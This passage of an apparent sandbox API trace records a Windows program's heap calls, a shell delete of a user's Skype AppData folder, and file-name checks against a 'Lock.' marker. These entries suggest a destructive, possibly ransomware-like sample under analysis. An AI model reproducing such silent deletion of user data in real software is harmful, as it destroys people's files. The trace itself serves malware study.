dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0150.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0150.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0150.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0150.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0150.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0150.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eace8 [0150.321] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Skype", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpFilePart=0x8cf650*="Skype") returned 0x25 [0150.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eace8 | out: hHeap=0x2af0000) returned 1 [0150.321] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype")) returned 0x10 [0150.321] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0150.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.824] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0150.824] TranslateMessage (lpMsg=0x8cf968) returned 0 [0150.824] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0150.824] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0150.824] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0150.825] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0150.825] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.825] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0150.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0150.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0150.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0150.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0150.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sn-hlisepFoxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n-hlisepFoxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-hlisepFoxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hlisepFoxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lisepFoxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="isepFoxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sepFoxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="epFoxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pFoxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oxRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xRII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RII.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="II.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0150.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0150.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0150.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0150.826] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0150.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0150.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0150.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 